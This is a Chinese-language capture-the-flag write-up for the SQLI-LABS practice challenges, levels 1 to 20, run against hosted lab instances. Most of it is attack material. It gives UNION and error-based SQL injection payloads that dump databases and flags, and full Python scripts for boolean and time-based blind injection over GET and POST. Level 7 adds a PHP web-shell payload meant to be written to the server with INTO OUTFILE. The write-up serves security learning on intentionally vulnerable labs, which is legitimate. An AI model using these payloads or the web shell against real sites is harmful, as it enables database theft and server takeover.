SQLI-LABS 闯关记录
注:本文脚本需要根据自身情况修改
第一关
?id=1' or 1=1 %23 //字符型注入(单引号闭合;%23 是注释符 # 的 URL 编码,用来注释掉后面的 SQL)
?id=1' or 1=1 union select 1,2,3,4%23 //select 4 列时报错,说明列数为 3
?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //爆全部库
库名 challenges,ctftraining,information_schema,mysql,performance_schema,security,test
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'%23 //查 ctftraining 库下的表
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'%23 //查 flag 表的字段
?id=-1' union select 1,2,flag from ctftraining.flag%23 //跨库查询
第二关
?id=1' or 1=1 # 报错信息里原样出现 ' or 1=1 LIMIT 0,1,说明单引号没有闭合任何引号,考虑数字型注入
?id=1 or 1=1 //成功,为数字型注入
?id=-1 union select 1,2,flag from ctftraining.flag%23
接下来的步骤和第一关一样
第三关
?id=1')or 1=1 # //单引号加括号闭合,接下来步骤应该一样
?id=-1') union select 1,2,flag from ctftraining.flag%23
第四关
?id=1")or 1=1 # //双引号加括号闭合,接下来步骤应该一样
?id=-1") union select 1,2,flag from ctftraining.flag%23
第五关
报错注入也行
?id=2'and 1=1 %23 正常回显
?id=2'and 1=2 %23 无回显(页面只泄露条件真假,不回显数据,所以用布尔盲注)
贴上我的脚本
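import time

# Boolean-based blind SQL injection against sqli-labs Less-5.
#
# The page leaks one bit per request: TRUE_MARKER is rendered when the
# injected condition holds and is absent otherwise.  Each character of the
# target value is recovered by binary-searching its ASCII code with an
# `ascii(substr(value, i, 1)) > threshold` probe.
#
# NOTE: written against one specific lab instance; change `url`, TRUE_MARKER
# and PAYLOAD for another target (see "modify per your situation" above).
url = "http://46be5e92-e82c-4f5b-a5b9-5a6fa17b8493.node4.buuoj.cn/Less-5/?id=2 'and "

TRUE_MARKER = "You are in..........."  # rendered only on a TRUE response
REQUEST_DELAY = 1.0     # seconds to wait after each request (the BUU platform throttles)
REQUEST_TIMEOUT = 10.0  # seconds; without it one stalled connection hangs the whole run
MAX_LEN = 1290          # positions 1..MAX_LEN-1 are probed, as in the original loop

# Probe templates; the two {} slots are (1-based position, ASCII threshold).
# Exactly one is active; the others walk the schema the same way.
# PAYLOAD = "if(ascii(substr(database(),{},1))>{},1,0) %23"  # current database
# PAYLOAD = "if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},1,0) %23"  # all databases
# PAYLOAD = "if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctftraining'),{},1))>{},1,0) %23"  # tables
# PAYLOAD = "if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},1,0) %23"  # columns
PAYLOAD = "if(ascii(substr((select flag from ctftraining.flag),{},1))>{},1,0) %23"  # the flag


def _search_char(oracle, position, low=31, high=127):
    """Return the ASCII code of the character at `position` via binary search.

    `oracle(position, threshold)` must answer True iff
    ascii(substr(value, position, 1)) > threshold on the server.  The search
    returns the smallest code c in [low, high] with ascii <= c, i.e. the
    character itself while it lies in 32..126.  Past the end of the value
    substr() yields '' and ascii('') is 0, so every probe answers False and
    `low` comes back -- that is the end-of-string sentinel.  Starting at 31
    (the original started at 32 and stopped on 32) keeps a real space
    character distinguishable from the sentinel.  Codes above `high` are
    clamped, as before.
    """
    while low < high:
        mid = (low + high) >> 1
        if oracle(position, mid):
            low = mid + 1  # ascii > mid
        else:
            high = mid     # ascii <= mid
    return low


def extract(oracle, max_len=MAX_LEN):
    """Recover a string one character at a time through a boolean oracle.

    Positions 1..max_len-1 are probed in order; the first position whose
    search returns the end-of-string sentinel (< 32) stops the extraction.
    Returns the recovered text (possibly empty).
    """
    chars = []
    for position in range(1, max_len):
        code = _search_char(oracle, position)
        if code < 32:
            break
        chars.append(chr(code))
    return "".join(chars)


def _http_oracle(session, base_url, template):
    """Build an oracle that asks the Less-5 page one question per GET."""
    def oracle(position, threshold):
        r = session.get(base_url + template.format(position, threshold),
                        timeout=REQUEST_TIMEOUT)
        time.sleep(REQUEST_DELAY)  # throttle: the BUU platform rate-limits requests
        return TRUE_MARKER in r.text
    return oracle


def main():
    import requests  # third-party; local import keeps the search logic importable without it
    with requests.Session() as session:
        print(extract(_http_oracle(session, url, PAYLOAD)))


if __name__ == "__main__":
    main()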
第六关
脚本中 url 末尾的 ' 改为 \" 即可(Python 双引号字符串里的双引号需要转义)
第七关
到第一关查路径先
?id=-1'union select 1,@@basedir,@@datadir %23
Your Login name:/usr
Your Password:/var/lib/mysql/
emmmm网站路径写不进去????
上面查到的 @@basedir / @@datadir 是 MySQL 的安装目录和数据目录,并不是网站根目录;另外 into outfile 还要求当前数据库用户有 FILE 权限、secure_file_priv 没有限制写入位置,并且目标目录对 MySQL 进程可写,少一个条件都写不进去
记录一下还没写出来
语句是 union select 1,2,'<?php @eval($_POST[a]);?>' into outfile '网站根目录的绝对路径/文件名.php'
第八关
第五个脚本可以用
第九关
判断闭合 and if(1=2,1,sleep(10)) # 看刷新时间
一般闭合为 ' " ') ") 这几种,多试试加括号。。。应该是这样
时间盲注
贴给脚本
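import time

# Time-based blind SQL injection against sqli-labs Less-9.
#
# The page renders the same content whatever the condition, so the oracle is
# the response time: the probe calls sleep() when
# `ascii(substr(value, i, 1)) > threshold` holds, and a response slower than
# DELAY_THRESHOLD is read as True.  Each character is then recovered by
# binary search over its ASCII code.
#
# NOTE: written against one specific lab instance; change `url`, PAYLOAD and
# the timing constants for another target.  Network jitter above the
# threshold misreads a bit -- raise both sleep() and DELAY_THRESHOLD on a
# slow link.
url = "http://e4cb6dc3-7b2c-4c2a-913c-c7e1a9dae714.node4.buuoj.cn/Less-9/?id=2 'and "

DELAY_THRESHOLD = 1.0   # seconds; must agree with the sleep() inside PAYLOAD
REQUEST_TIMEOUT = 15.0  # seconds; must stay well above the injected sleep or TRUE answers time out
MAX_LEN = 1290          # positions 1..MAX_LEN-1 are probed, as in the original loop

# Probe templates; the two {} slots are (1-based position, ASCII threshold).
# Exactly one is active.  Every template must use sleep(1): the original
# "all databases" line still had the `1,0` form from the boolean script,
# which can never trip a timing oracle.
PAYLOAD = "if(ascii(substr(database(),{},1))>{},sleep(1),0) %23"  # current database
# PAYLOAD = "if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},sleep(1),0) %23"  # all databases
# PAYLOAD = "if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctftraining'),{},1))>{},sleep(1),0) %23"  # tables
# PAYLOAD = "if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},sleep(1),0) %23"  # columns
# PAYLOAD = "if(ascii(substr((select flag from ctftraining.flag),{},1))>{},sleep(1),0) %23"  # the flag


def _search_char(oracle, position, low=31, high=127):
    """Return the ASCII code of the character at `position` via binary search.

    `oracle(position, threshold)` must answer True iff
    ascii(substr(value, position, 1)) > threshold on the server.  Returns the
    smallest code c in [low, high] with ascii <= c.  Beyond the end of the
    value ascii('') is 0, every probe answers False and `low` (31) comes
    back as the end-of-string sentinel; starting below 32 keeps a real space
    distinguishable from that sentinel (the original stopped on 32).
    """
    while low < high:
        mid = (low + high) >> 1
        if oracle(position, mid):
            low = mid + 1  # ascii > mid
        else:
            high = mid     # ascii <= mid
    return low


def extract(oracle, max_len=MAX_LEN):
    """Recover a string one character at a time through a boolean oracle.

    Probes positions 1..max_len-1 and stops at the first end-of-string
    sentinel (< 32).  Returns the recovered text (possibly empty).
    """
    chars = []
    for position in range(1, max_len):
        code = _search_char(oracle, position)
        if code < 32:
            break
        chars.append(chr(code))
    return "".join(chars)


def _timing_oracle(session, base_url, template):
    """Build an oracle that classifies each GET by its round-trip time."""
    def oracle(position, threshold):
        started = time.monotonic()  # monotonic: unaffected by wall-clock adjustments
        session.get(base_url + template.format(position, threshold),
                    timeout=REQUEST_TIMEOUT)
        return time.monotonic() - started >= DELAY_THRESHOLD
    return oracle


def main():
    import requests  # third-party; local import keeps the search logic importable without it
    with requests.Session() as session:
        print(extract(_timing_oracle(session, url, PAYLOAD)))


if __name__ == "__main__":
    main()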
第十关
把上面 payload 的 ' 改为 "
第十一关
跟第一关一样,只是改了请求方式
字段数变为 2;由于是 POST 表单提交,注释符直接写 #,不用再 URL 编码成 %23
-1' union select 1,flag from ctftraining.flag #
第十二关
跟第十一关一样,把 ' 改为 ")
-1") union select 1,flag from ctftraining.flag#
第十三关
post类型盲注,还好学了一丢丢爬虫
这边贴个脚本。。。在前几个脚本基础上做的修改
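import time

# Boolean-based blind SQL injection against sqli-labs Less-13 (POST login form).
#
# The login page shows flag.jpg when the injected condition makes the WHERE
# clause true and nothing otherwise, so TRUE_MARKER in the body is the oracle.
# Each character of the target value is recovered by binary-searching its
# ASCII code with an `ascii(substr(value, i, 1)) > threshold` probe placed in
# the `uname` field.
#
# NOTE: written against one specific lab instance; change `url`, TRUE_MARKER
# and PAYLOAD for another target.
url = "http://e4cb6dc3-7b2c-4c2a-913c-c7e1a9dae714.node4.buuoj.cn/Less-13/"

TRUE_MARKER = "flag.jpg"  # image referenced only on a TRUE response
REQUEST_DELAY = 1.0       # seconds to wait after each request (the BUU platform throttles)
REQUEST_TIMEOUT = 10.0    # seconds; without it one stalled connection hangs the whole run
MAX_LEN = 1290            # positions 1..MAX_LEN-1 are probed, as in the original loop

# Value of the `uname` field; the two {} slots are (1-based position, ASCII
# threshold).  `1')` closes the quote-and-parenthesis around the username.
# PAYLOAD = "1') or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},1,0) #"  # all databases
# PAYLOAD = "1') or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1))>{},1,0) #"  # tables
# PAYLOAD = "1') or if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},1,0) #"  # columns
PAYLOAD = "1') or if(ascii(substr((select flag from ctftraining.flag),{},1))>{},1,0) #"  # the flag


def _search_char(oracle, position, low=31, high=127):
    """Return the ASCII code of the character at `position` via binary search.

    `oracle(position, threshold)` must answer True iff
    ascii(substr(value, position, 1)) > threshold on the server.  Returns the
    smallest code c in [low, high] with ascii <= c.  Beyond the end of the
    value ascii('') is 0, so every probe answers False and `low` (31) comes
    back as the end-of-string sentinel; starting below 32 keeps a real space
    distinguishable from that sentinel (the original stopped on 32).
    """
    while low < high:
        mid = (low + high) >> 1
        if oracle(position, mid):
            low = mid + 1  # ascii > mid
        else:
            high = mid     # ascii <= mid
    return low


def extract(oracle, max_len=MAX_LEN):
    """Recover a string one character at a time through a boolean oracle.

    Probes positions 1..max_len-1 and stops at the first end-of-string
    sentinel (< 32).  Returns the recovered text (possibly empty).
    """
    chars = []
    for position in range(1, max_len):
        code = _search_char(oracle, position)
        if code < 32:
            break
        chars.append(chr(code))
    return "".join(chars)


def _post_oracle(session, base_url, template):
    """Build an oracle that submits the login form once per question."""
    def oracle(position, threshold):
        data = {"uname": template.format(position, threshold), "passwd": 1}
        r = session.post(url=base_url, data=data, timeout=REQUEST_TIMEOUT)
        time.sleep(REQUEST_DELAY)  # throttle: the BUU platform rate-limits requests
        return TRUE_MARKER in r.text
    return oracle


def main():
    import requests  # third-party; local import keeps the search logic importable without it
    with requests.Session() as session:
        print(extract(_post_oracle(session, url, PAYLOAD)))


if __name__ == "__main__":
    main()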
第十四关
把上面中的 ') 换成 "
第十五关
判断闭合 ' or if(1=2,1,sleep(10)) # (1=2 恒假,所以语法正确时一定会 sleep;页面明显延迟就说明 ' 闭合成功)
时间盲注POST版
贴上我的脚本
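import time

# Time-based blind SQL injection against sqli-labs Less-15 (POST login form).
#
# The login page gives no visible difference between true and false, so the
# oracle is the response time: the probe in the `uname` field calls sleep()
# when `ascii(substr(value, i, 1)) > threshold` holds, and a response slower
# than DELAY_THRESHOLD is read as True.  Each character is then recovered by
# binary search over its ASCII code.
#
# NOTE(review): the active payload sleeps 0.5 s per evaluation but the
# threshold is 1 s.  That can only work if the server sleeps more than once
# per request -- plausibly because `... or if(...)` is evaluated for every
# row the login query scans -- so the effective delay depends on the target's
# table size.  Confirm against the target, or make sleep() and
# DELAY_THRESHOLD agree directly.
#
# NOTE: written against one specific lab instance; change `url`, PAYLOAD and
# the timing constants for another target.
url = "http://e4cb6dc3-7b2c-4c2a-913c-c7e1a9dae714.node4.buuoj.cn/Less-15/"

DELAY_THRESHOLD = 1.0   # seconds; see the NOTE above about its relation to sleep()
REQUEST_TIMEOUT = 30.0  # seconds; must stay above the worst-case TRUE delay or TRUE answers time out
MAX_LEN = 1290          # positions 1..MAX_LEN-1 are probed, as in the original loop

# Value of the `uname` field; the two {} slots are (1-based position, ASCII
# threshold).  `1'` closes the single quote around the username.
# PAYLOAD = "1' or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},sleep(0.5),0) #"  # all databases
# PAYLOAD = "1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1))>{},sleep(0.5),0) #"  # tables
# PAYLOAD = "1' or if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},sleep(0.5),0) #"  # columns
PAYLOAD = "1' or if(ascii(substr((select flag from ctftraining.flag),{},1))>{},sleep(0.5),0) #"  # the flag


def _search_char(oracle, position, low=31, high=127):
    """Return the ASCII code of the character at `position` via binary search.

    `oracle(position, threshold)` must answer True iff
    ascii(substr(value, position, 1)) > threshold on the server.  Returns the
    smallest code c in [low, high] with ascii <= c.  Beyond the end of the
    value ascii('') is 0, so every probe answers False and `low` (31) comes
    back as the end-of-string sentinel; starting below 32 keeps a real space
    distinguishable from that sentinel (the original stopped on 32).
    """
    while low < high:
        mid = (low + high) >> 1
        if oracle(position, mid):
            low = mid + 1  # ascii > mid
        else:
            high = mid     # ascii <= mid
    return low


def extract(oracle, max_len=MAX_LEN):
    """Recover a string one character at a time through a boolean oracle.

    Probes positions 1..max_len-1 and stops at the first end-of-string
    sentinel (< 32).  Returns the recovered text (possibly empty).
    """
    chars = []
    for position in range(1, max_len):
        code = _search_char(oracle, position)
        if code < 32:
            break
        chars.append(chr(code))
    return "".join(chars)


def _timing_oracle(session, base_url, template):
    """Build an oracle that classifies each form POST by its round-trip time."""
    def oracle(position, threshold):
        data = {"uname": template.format(position, threshold), "passwd": 1}
        started = time.monotonic()  # monotonic: unaffected by wall-clock adjustments
        session.post(url=base_url, data=data, timeout=REQUEST_TIMEOUT)
        return time.monotonic() - started >= DELAY_THRESHOLD
    return oracle


def main():
    import requests  # third-party; local import keeps the search logic importable without it
    with requests.Session() as session:
        print(extract(_timing_oracle(session, url, PAYLOAD)))


if __name__ == "__main__":
    main()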
第十六关
判断闭合 ")or if(1=2,1,sleep(10)) #
把上面脚本的 ' 改为 ")
第十七关
username必须得admin才行,没想到。。靠!!!
报错注入
1' or updatexml(1,concat(0x26,database(),0x26),1)# (0x26 是 & 字符,用作分隔符方便在报错信息里定位结果)
1' or updatexml(1,concat(0x26,database(),0x26),1)#
1' or updatexml(1,concat(0x26,(select right(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
1' or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
左右拼接一下就是库名
····中间差不多不多赘述了
1' or updatexml(1,concat(0x26,(select left(flag,30) from ctftraining.flag),0x26),1)#
1' or updatexml(1,concat(0x26,(select right(flag,30) from ctftraining.flag),0x26),1)#
左右拼接一下就是flag
另一个函数 注:updatexml 和 extractvalue 的报错信息都最多只显示 32 个字符,所以上面才用 left/right 各取 30 位再拼接;flag 更长时要按位置多次截取
extractvalue(1,concat(0x26,(SQL语句),0x26));
第十八关
把 UA 换成 ' or updatexml(1,concat(0x26,database(),0x26),1) and '
应该是后面还有语句,没想到。。。看看源码
// Less-18 server-side source, quoted as-is from the lab (the build-up of $sql,
// $uagent, $IP and $uname happens above this excerpt).  After the login query
// the request's User-Agent is written to a log table.
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)// login succeeded
{
// Insert the user's User-Agent, IP and uname into a table.
// $uagent and $IP are interpolated straight into the SQL string; no escaping
// of either is visible in this excerpt, so a crafted User-Agent header becomes
// part of the INSERT.  The payload used in this writeup ends with "and '" so
// that the quote opened by '$uagent' is closed again and the statement stays
// syntactically valid.  Note $uname is inserted unquoted; whatever handling it
// received is outside this excerpt.
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert); // run the insert (legacy mysql_* API, no parameterised statements)
echo 'Your User Agent is: ' .$uagent;
print_r(mysql_error()); // prints the full MySQL error to the page -- this is what makes the updatexml() error-based extraction readable
}
else
{
echo '<font color= "#0000ff" font size="3">';
print_r(mysql_error()); // same error disclosure on the failed-login branch
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
果然是
' or updatexml(1,concat(0x26,(select right(flag,30) from ctftraining.flag),0x26),1) and '
' or updatexml(1,concat(0x26,(select left(flag,30) from ctftraining.flag),0x26),1) and '
读取flag
第十九关
改referer和上面一样
第二十关
这个不看源码做不了吧。。。。。
// Author's note: uname and passwd are filtered, but the cookie is not, so it is read directly
// (the filtering of uname/passwd is not shown in this excerpt).
$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
// The query above is built from the cookie value with no filtering visible here,
// so the 'uname' cookie is an injection point (cookie injection).
buu没有回显。。。。
ctfshow有。。。
常规注入
不做赘述
查看17题